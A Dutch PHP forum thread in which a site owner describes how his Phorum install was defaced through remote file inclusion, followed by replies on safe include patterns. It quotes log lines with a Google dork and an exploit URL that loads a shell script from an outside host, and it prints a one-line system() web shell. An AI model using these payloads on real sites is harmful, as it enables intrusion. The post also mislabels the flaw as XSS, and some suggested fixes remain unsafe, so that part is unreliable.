Veiligheidsbreuk, gehacked, XSS

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Fullstack developer

Functie omschrijving We are looking for a dutch native speaker Wil jij werken als Senior Developer en werken aan een applicatie die duizenden marketingcampagnes automatisch aanstuurt? Dit is je kans! Kom werken voor onze opdrachtgever en in deze rol zul je veel vrijheid en verantwoordelijkheid krijgen om gezamenlijk de applicatie naar een hoger plan te tillen. Wat ga je verder doen: Optimaliseren, beheren en uitbreiden van onze applicatie; Het bouwen van aansluitingen op de systemen van partners middels API’s; Meedenken over de technische/ontwikkel-standaarden; Proactief verbeterpunten voorstellen. Bedrijfsprofiel Het is een organisatie die met een team van verschillende developers én marketeers

Bekijk vacature »

Junior PHP Developer

Je maakt een vliegende start van je carrière, door meteen mee te bouwen aan de digitale aspecten van Coolblue. Wat doe je als Junior PHP Developer bij Coolblue? Als Junior PHP Developer ben je meteen vanaf de start onderdeel van een development team. Je kijkt veel mee met collega’s en volgt trainingen om te groeien als Junior Developer. Op dat moment komt je wil om steeds te blijven leren naar boven. Daarnaast pak je in de sprints ook je eigen stories op om Coolblue iedere dag een beetje beter te kunnen maken. Je sterk analytisch vermogen komt dan ook goed

Bekijk vacature »

Front-End React Developer

Als Front-End React Developer verbeter je de user experience van onze eigen webapplicaties voor onze collega's binnen Coolblue. Wat doe je als Front-End React Developer bij Coolblue? Als Front-end React Developer werk je aan de gebruiksvriendelijkheid van onze webshop voor miljoenen klanten met React.js. Je vindt het leuk om samen te werken met de UX designer om stories op te pakken. Daarnaast ben je trots op je werk en verwelkomt alle feedback. Ook Front-end React Developer worden bij Coolblue? Lees hieronder of het bij je past. Dit vind je leuk om te doen Verbeteren van de gebruiksvriendelijkheid van onze webshop

Bekijk vacature »

Back-end Developer

Functieomschrijving Heb jij kort geleden je HBO ICT Informatica diploma in ontvangst mogen nemen? Of heb je een aantal jaar ervaring als Software Developer en ben je klaar voor een nieuw hoofdstuk in jouw carrière? Voor een gewaardeerde werkgever in de regio van Goirle zijn wij op zoek naar een junior/medior Back-end Developer met affiniteit met MS Acess. Samen met een vooruitstrevend team ben je verantwoordelijk voor het ontwikkelen van maatwerk software voor hun klanten. Je hebt kennis of ervaring van SQL en affiniteit met MS Acess. Je bent klantvriendelijk en flexibel ingesteld en vindt het leuk om klanten te

Bekijk vacature »

Senior .NET Developer I goed salaris en deels thui

Bedrijfsomschrijving Mijn opdrachtgever is al ruim 20 jaar een gevestigde naam in de wereld van software ontwikkeling, met drie kantoren in de Randstad, waaronder Alphen aan den Rijn. Zij richten zich op het bouwen van IT-oplossingen die ervoor zorgen dat de productiviteit van klanten te allen tijden optimaal is. Hiervoor neemt jouw nieuwe werkgever het volledige ontwikkelproces tot haar rekening; van het eerste gesprek om de klantwensen in kaart te brengen, tot aan het uiteindelijke onderhoud van de opgeleverde oplossing. In totaal werken er inmiddels bijna 200 gemotiveerde IT-ers binnen deze organisatie. De gemiddelde leeftijd ligt rond de 35. Het

Bekijk vacature »

PHP Developer

Functieomschrijving Vanuit het hoofdkantoor in omgeving Roosendaal, ontwikkel je als PHP Developer niet alleen webapplicaties, maar ben je verder ook gefocust op het continu inspelen op nieuwe trends en ontwikkelingen m.b.t software development. Naast het bouwen van webapplicaties, ontwikkelen zij ook webshops en websites voor gave opdrachtgevers! Wat ga je doen? Het schrijven van schone en efficiënte codes volgens het Symfony framework; Het ontwerpen en implementeren van webapplicaties met het Symfony-framework; Onderhouden en updaten van bestaande applicaties die zijn gebouwd met het Symfony framework; Het testen van ontwikkelde applicaties om te zorgen dat ze goed functioneren en voldoen aan de

Bekijk vacature »

Back-end Developer

Functieomschrijving Voor een erkende werkgever in de regio van Middelburg zijn wij op zoek naar een enthousiaste PHP / Symfony Developer. Een ambitieus persoon die het gemotiveerde development team komt versterken met het realiseren van nieuwe en complexe projecten. Ben jij op zoek naar een baan met veel uitdaging binnen een snelgroeiend e-commerce bedrijf, waar je de tijd en ruimte krijgt voor professionele groei? Dit ga je doen: Je bent verantwoordelijk voor de beheer en ontwikkeling van de serviceportal in Symfony en de webshops in de tweede versie van Magento; Je houdt je bezig met het ontwikkelen van nieuwe functionaliteiten;

Bekijk vacature »

Back-end Developer

Functieomschrijving Heb jij kort geleden jouw HBO ICT diploma in ontvangst mogen nemen? Of ben je toe aan een nieuwe uitdaging? Voor een gewaardeerde werkgever in regio Oosterhout zijn wij op zoek naar een back-end developer. Kennis of ervaring met C# & SQL is een must! Je bent verantwoordelijk voor de beheer en ontwikkeling van de software; Je draagt bij aan de implementatie van aanpassingen, verbeteringen en aanvullingen in de C# based applicaties; Je test de software en ontwikkelt deze door; Je houdt je bezig met het ontwikkelen van nieuwe functionaliteiten; Je brengt de aanpassingssuggesties van klanten in kaart, om

Bekijk vacature »

Senior Fullstack developer wanted! (C#, Java, Angu

Functie Under the guidance of 3 account managers, one of whom will be your point of contact within your expertise, you will start working for various clients. He or she will help you find a suitable and challenging assignment. Naturally, they will take your situation, experience and (technical) ambitions into account. The assignments last one to two years on average. This allows you to really commit to a project and make an impact as a consultant. Besides the assignment, you will regularly meet your colleagues from the IT department to share knowledge or discuss new trends, for example. Master classes

Bekijk vacature »

.NET Developer Azure

Dit ga je doen Het ontwerpen en bouwen van diverse applicaties (C#, ASP.NET, MVC); Het ontwikkelen van Webservices (WCF); Het meewerken aan de transitie naar Azure; Het samenwerken met collega's binnen een Scrumteam en meedenken over de User Stories; Het bouwen van unittesten; Meedenken over nieuwe tooling, ontwikkelingen en technologieën in de markt. Hier ga je werken Je komt te werken bij een organisatie die verantwoordelijk is voor de ontwikkeling van verschillende portalen. Deze portalen worden gebruikt door diverse partijen en jouw taak is om ervoor te zorgen dat deze optimaal functioneren. Je wordt onderdeel van een Scrumteam en werkt

Bekijk vacature »

Front end developer

Functie Qua type opdrachten is er echt een verscheidenheid aan afnemers, zo werken ze met grote multinationals, maar ook met startups. Zo kom je te werken in een gevarieerde omgeving en kan je ook schakelen tussen verschillende culturen. De projecten variëren van greenfield projecten tot langdurige ontwikkeltrajecten. Hier wordt alleen maar gewerkt met aan front end projecten. Daarom maakt het onze partner niet uit waar jij kennis van hebt, als je maar gedegen kennis hebt van Javascript frameworks, Unit testing en ook bekend bent met de scrum methodiek. Eisen Minimaal 4 jaar relevante werkervaring Kennen en ervaring van Javascript frameworks

Bekijk vacature »

C#.NET developer

Functieomschrijving Wij zijn op zoek naar een gepassioneerde Full Stack C#.NET Software Developer. Als Software Developer ben je verantwoordelijk voor het ontwikkelen van webapplicaties, apps en dashboards voor de eigen IOT-oplossingen. Je werkt samen met andere ontwikkelaars en engineers om de sensoren in machines uit te lezen en deze data om te zetten in management informatie voor jullie klanten. Taken en verantwoordelijkheden: Testen en valideren van de ontwikkelde software. Ontwikkelen en onderhouden van webapplicaties, apps en dashboards voor de eigen IOT-oplossingen. Je gaat aan de slag met diverse technologieën en frameworks. Denk hierbij aan C#, JS frameworks, HTML, CSS, TypeScript,

Bekijk vacature »

Software Programmeur

Functie omschrijving Voor een informele club in omgeving Delft zijn wij op zoek naar versterking. Ben jij op zoek naar een nieuwe uitdaging als Software Programmeur lees dan snel verder! Als ontwikkelaar kom je terecht op een afdeling van 6 medewerkers. Werkzaamheden Programmeur Je bent bezig met het ontwikkelen van software en webapplicaties. Je kunt technische klussen uitvoeren op locatie. Je onderhoudt contact met de projectleider om er zeker van te zijn dat een project goed verloopt. Je zult klanten ondersteunen. Verder zul je technische ontwerpen en gebruikersdocumentaties schrijven en deze onderhouden. Er wordt voornamelijk gewerkt met PHP, Java en

Bekijk vacature »

Front-end developer (React)

Functie Het frontend team bestaat momenteel uit 4 dedicated front-enders en is hard aan het groeien! Ook werken er diverse designers waar je veel mee schakelt. Samen leveren jullie een essentiële bijdrage aan de applicaties die ze voor hun klanten realiseren, jij bent hierin de schakel tussen de eindgebruiker en de slimme backend. Je werkt in het frontend team samen met de backend teams en product owners om te zorgen dat onze applicaties een fijne gebruikerservaring opleveren. Ze werken o.a. met: React, Atomic design, Styled components, JavaScript / TypeScript, NPM, Webpack Blade templates, HTML, SCSS, Git flow. Eisen • HBO

Bekijk vacature »

Front-end developer gezocht

Functie Je komt in een team met ambitieuze developers die de passie voor Front-End met jou delen. Samen ga je aan de slag met leuke en leerzame opdrachten. Het team heeft een eigen budget en financiën en zij bepalen zelf hoe dat besteed en investeert wordt. Je gebruikt tools als JavaScript, Node.js, React, Angular, Typescript en Vue.js wanneer je werkt aan de opdrachten. Daarnaast zul je veel leren van je collega’s en gezamenlijk een leuke tijd doorbrengen tijdens activiteiten zoals wintersport, hackatons en conferentiebezoeken. Je krijgt niet alleen de mogelijkheid Front-End te ontwikkelen, maar ook vooral jezelf. Dit kan behaald

Bekijk vacature »
Arend a

Arend a

12/07/2004 05:07:00
Quote Anchor link
Een veiligheidbreuk, een goede daad uit het echte leven.

Ik roep al een redelijke tijd dingen over veiligheid, en nu ik even niet kan slapen ga ik deze kennis ook maar met jullie delen. Gisteren rond een uur of negen werd op vorago.nl een stukje php code: phorum gedefaced door een rus. Een kleine vier uur later heb ik dit forum offline gehaald en ben eens gaan kijken wat er eigenlijk aan de hand was.

De rus in kwestie gaat alsvolgd aan het werk, de eerste http request is:

vorago@vh1:~$ cat onderzoek|head
[09/Jul/2004:20:19:21 +0200] "GET /phorum/admin/ HTTP/1.1" 200 5042 "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphorum%2Fadmin+%223.3.2a%22&btnG=Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]"

en vervolgens de exploit:

[09/Jul/2004:20:22:34 +0200] "GET /phorum/admin/actions/del.php?include_path=http://deface2.narod.ru/shep.php&cmd=ls HTTP/1.1" 403 7591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]"

de shep.php is een file met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($cmd);
?>


Dit werkt alsvolgd: het forum include eerst de text-only shep.php, gaat deze lokaal uitvoeren en voert dit uit. Dit is het welbekende XSS symtroom: cross site scripting. Hierbij is dus een shell vergeven aan de scriptkiddo. Daar sta ik even van te kijken. Achteraf ben ik blij dat er niet zo gek veel kwaad is geschied. Toch had hij met even doorpielen een mysql wachtwoord kunnen ontfutselen, en door zich niet zo enorm groot en wijd een forum te defacen (wat ik persoonlijk buitengewoon zielig vind) had ik er zelfs niet eens achter gekomen.

Dit is een resultaat van een 3rd party script wat ik niet goed beheerd heb, dit is erg slecht. Doch, ik ben weer wakker geschud. Verder heeft de scriptkiddie in kwestie nog wat rond zitten neuzen bij andere scripts, zonder resultaat.

In het kort komt het hier op neer:
een phpfile fout.php met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST["naam"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

waarin exploit.php

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($_POST["commando"]);
?>


!OF WAT VOOR PHP CODE DAN OOK! bevat.

Wat de oplossing hiervoor is?
persoonlijk gebruik ik preg_replace om mijn invoer te sanatizen.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
$pad
= "/home/pad/naar/file";
$variabele = $_POST["naam"];
$variabele = preg_replace('/\W','', $variabele);
# zorg dat er alleen letters mogen voorkomen in de variabele.
if (file_exists("${pad}/${variabele}.ext")) {
  include("${pad}/${variabele}.ext");
}

?>


Conclusie: wees alert, niet overmoedig en blijft sanatizen.
Tot mijn schaamte kwam ik een bovenaande compleet foute constructie tegen in een scriptje dat ik 'even' geschreven heb voor het includen in mijn layout. Het 'even' iets doen en niet nauwkeurig zijn kan fataal zijn voor je site. Gelukkig heb ik reguliere backups, ook van mysql en zit ik hier redelijk safe. Maar het is gewoon doodzonde om veel werk door een paar eikels teloor zien gaan.
 
PHP hulp

PHP hulp

12/05/2024 13:47:38
 
B a s
Beheerder

B a s

12/07/2004 08:09:00
Quote Anchor link
omg :) maar goed dat je er achter bent gekomen.. maar was 'system()' dan functioneel op je server??
 
SerpenT

SerpenT

12/07/2004 11:37:00
Quote Anchor link
hoe kun je system() dan uitschakelen? op je server? want dit wil ik niet op mijn site laten gebeuren:O.

en nog iets arend:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST["naam"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

bedoel je hiet niet
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
inculde($_GET["naam"]);
?>

of pakt ie die meegestuurde variabele in de url ook als $_POST["naam"] :O
 
Arend a

Arend a

12/07/2004 11:58:00
Quote Anchor link
Het was laat :)

Maar het system commando uitschaken kan wel, maar dan zjin er nog wel 4 andere manieren om er omheen te kunnen. Je moet gewoon zorgen dat er geen malafide include() verwijzingen zijn.

Grtz,

Arend
Gewijzigd op 12/07/2004 11:59:00 door Arend a
 
Mitch X

Mitch X

12/07/2004 12:00:00
Quote Anchor link
Je laat dat toch nooit zo doen?
Ik deed dat altijd met een switch() die kon dus nooit iets anders dan de door mij ingegeven files.

Nu werk ik niet meer met includes maar das een ander verhaal :)
 
Arend a

Arend a

12/07/2004 12:02:00
Quote Anchor link
mja, dat vind ik persoonlijk nogal lomp. een beetje voor elke file in mn php file gaan pielen. Maar zoals je staat was het een quick fix van twee jaar terug die nog steeds liep.

Verder was de eerste hack een 3rd party script: phorum dat hij dmv googlen ging opzoeken en exploiten.
Gewijzigd op 12/07/2004 12:08:00 door Arend a
 
Bram Z

Bram Z

12/07/2004 13:08:00
Quote Anchor link
Die rus ziet er een profesional uit die moet mijn site niet weten :D
 
Arend a

Arend a

12/07/2004 13:10:00
Quote Anchor link
Professional? Welnee, het is een eerste klas scriptkiddo. Ik heb totaal geen respect voor deze gast. Hij was op de hoogte van een lek, en ging sites opzoeken die die software draaide om te hacken.

Sorry, geen enkel respect at all.
 

19/09/2005 19:52:00
Quote Anchor link
Quote:
Een veiligheidbreuk, een goede daad uit het echte leven.

Ik roep al een redelijke tijd dingen over veiligheid, en nu ik even niet kan slapen ga ik deze kennis ook maar met jullie delen. Gisteren rond een uur of negen werd op vorago.nl een stukje php code: phorum gedefaced door een rus. Een kleine vier uur later heb ik dit forum offline gehaald en ben eens gaan kijken wat er eigenlijk aan de hand was.

De rus in kwestie gaat alsvolgd aan het werk, de eerste http request is:

vorago@vh1:~$ cat onderzoek|head
[09/Jul/2004:20:19:21 +0200] \"GET /phorum/admin/ HTTP/1.1\" 200 5042 \"http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphorum%2Fadmin+%223.3.2a%22&btnG=Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]\"

en vervolgens de exploit:

[09/Jul/2004:20:22:34 +0200] \"GET /phorum/admin/actions/del.php?include_path=http://deface2.narod.ru/shep.php&cmd=ls HTTP/1.1\" 403 7591 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]\"

de shep.php is een file met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($cmd);
?>


Dit werkt alsvolgd: het forum include eerst de text-only shep.php, gaat deze lokaal uitvoeren en voert dit uit. Dit is het welbekende XSS symtroom: cross site scripting. Hierbij is dus een shell vergeven aan de scriptkiddo. Daar sta ik even van te kijken. Achteraf ben ik blij dat er niet zo gek veel kwaad is geschied. Toch had hij met even doorpielen een mysql wachtwoord kunnen ontfutselen, en door zich niet zo enorm groot en wijd een forum te defacen (wat ik persoonlijk buitengewoon zielig vind) had ik er zelfs niet eens achter gekomen.

Dit is een resultaat van een 3rd party script wat ik niet goed beheerd heb, dit is erg slecht. Doch, ik ben weer wakker geschud. Verder heeft de scriptkiddie in kwestie nog wat rond zitten neuzen bij andere scripts, zonder resultaat.

In het kort komt het hier op neer:
een phpfile fout.php met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST[\"naam\"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

waarin exploit.php

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($_POST[\"commando\"]);
?>


!OF WAT VOOR PHP CODE DAN OOK! bevat.

Wat de oplossing hiervoor is?
persoonlijk gebruik ik preg_replace om mijn invoer te sanatizen.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
$pad
= \"/home/pad/naar/file\";
$variabele = $_POST[\"naam\"];
$variabele = preg_replace(\'/\\W\',\'\', $variabele);
# zorg dat er alleen letters mogen voorkomen in de variabele.
if (file_exists(\"${pad}/${variabele}.ext\")) {
  include(\"${pad}/${variabele}.ext\");
}

?>


Conclusie: wees alert, niet overmoedig en blijft sanatizen.
Tot mijn schaamte kwam ik een bovenaande compleet foute constructie tegen in een scriptje dat ik \'even\' geschreven heb voor het includen in mijn layout. Het \'even\' iets doen en niet nauwkeurig zijn kan fataal zijn voor je site. Gelukkig heb ik reguliere backups, ook van mysql en zit ik hier redelijk safe. Maar het is gewoon doodzonde om veel werk door een paar eikels teloor zien gaan.
 
Han eev

Han eev

19/09/2005 20:31:00
Quote Anchor link
Waarom doen ze dit?? wat hebben ze eraan?
 
Alfred -

Alfred -

19/09/2005 20:42:00
Quote Anchor link
Waarom worden er virussen gemaakt? Wat heb je er aan als je aan ander zn pc naar de kloten helpt? Juist ja, nog onnuttige vragen Han?
 
Jelmer -

Jelmer -

19/09/2005 20:55:00
Quote Anchor link
1 keer en nooit weer (neem ik aan)
Hoe simpel het ook is eigenlijk.

Ik moet toegeven dat ik ook een paar keer een site ben tegengekomen, waarvan ik dacht 'deze is makkelijk te bewerken'. Dus ben toen even gaan knutselen, en inderdaad, ook zo'n include (andere was trouwens een .inc bestand met wachtwoorden :*) ). Enige verschil is dat ik alleen heb gekeken, en daarna een mailtje heb gestuurd naar de desbetreffende webmaster.

Sterker nog, ik heb een keer (per ongeluk, was niet mijn bedoeling) toegang verkregen tot alle websites die op mijn webhosting werden gehost. Echt asociaal groot lek. Heb het gemeld (even paar screenies voor bewijs, wachtwoorden weggehaald) en blij dat ze waren! Krijg nog een cadeautje ervoor ook :P

Ik had natuurlijk ook al die wachtwoorden op internet kunnen zetten, maar dat wat ik nu heb gedaan voelt toch beter. Lees je dat rus?
 
Pieter van Linschoten

Pieter van Linschoten

19/09/2005 21:16:00
Quote Anchor link
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
if (is_file($_GET['page'].".php"))
{

$include = $_GET['page'];
}
else{
$include = "Home";
}

include($include.".php");
?>
Gewijzigd op 19/09/2005 21:16:00 door Pieter van Linschoten
 
Legolas

Legolas

19/09/2005 21:25:00
Quote Anchor link
misschien moet je dat maar eerst ff vertalen voordat ie het kan lezen Jelmer ^^... En scriptkiddies, die zijn te zielig om sociaal te zijn =P.

Maar system is volgens mij overal geblokt ?. OW ennem wat ik me nou afvraag: hoe kan het in cluden van zo'n bestand nou werken? Ik bedoel de server waar het van komt parsed het ook... Of gaat dat via zielige geocities servers die geen php hebben =P.

Overigens is dit misbruik maken van de hosting, een beetje host wil dan nog wel eens een contract ontbinden =P. http://www.nic.ru/whois/?domain=narod.ru =P.

MJa, ik filter die gets altijd op slashes enzo, dan kunnen urls ook nie =). Net zoals ik tegen sql injection alle tekens van html-entities voorzien (inc. enkele quotes ej: htmlentities($_GET["var"], ENT_QUOTES);)

Mja, er is altijd wel iets =(
 
Eris -

Eris -

19/09/2005 21:28:00
Quote Anchor link
Gana we even oude koeien uit de sloot halen (Topic is een jaar oud)
 
Jelmer -

Jelmer -

19/09/2005 21:52:00
Quote Anchor link
ehe, dat had ik nog niet eens gezien. Stom

Dat van Lapidi lijkt mij ook niet echt veilig. Daarmee kan ik nog steeds cross-site scripten en ieder willekeurig bestand includen. Gewoon .php weglaten.
 
Winston Smith

Winston Smith

20/09/2005 00:02:00
Quote Anchor link
Ik gebruik altijd
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
<?php
// eerst mapje ervoor zetten
include('include/' . $page . '.inc.php');
?>


Dat is toch redelijk veilig, of zie ik iets over het hoofd?

(ook al is het een oud topic ^^)
 
Willem Jan Z

Willem Jan Z

20/09/2005 00:31:00
Quote Anchor link
Met die vraag zit ik eigenlijk ook... Ik dacht gewoon controleren of het bestand wel bestaat...

ik doe wel altijd uizonderingen maken voor bestanden op mijn server, zoals de config enzo... Zodat die niet opgehaald kunnen worden...

Maar dat is dus niet echt veilig blijkbaar...
Ga ik maar eens beetje aan werken...
 
Legolas

Legolas

20/09/2005 07:36:00
Quote Anchor link
gewoon punten en slashes eruit halen dan kan er geen url komen en blijft het in dezelfde map, kan je dus niet ../config.php doen =).
 
Jelmer -

Jelmer -

20/09/2005 07:40:00
Quote Anchor link
inderdaad. Of hem door een switch() / array van bestaande pagina's heen halen.
 
Legolas

Legolas

20/09/2005 08:11:00
Quote Anchor link
dan het beste een in_array, een switch is een beetje te veel werk :P
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.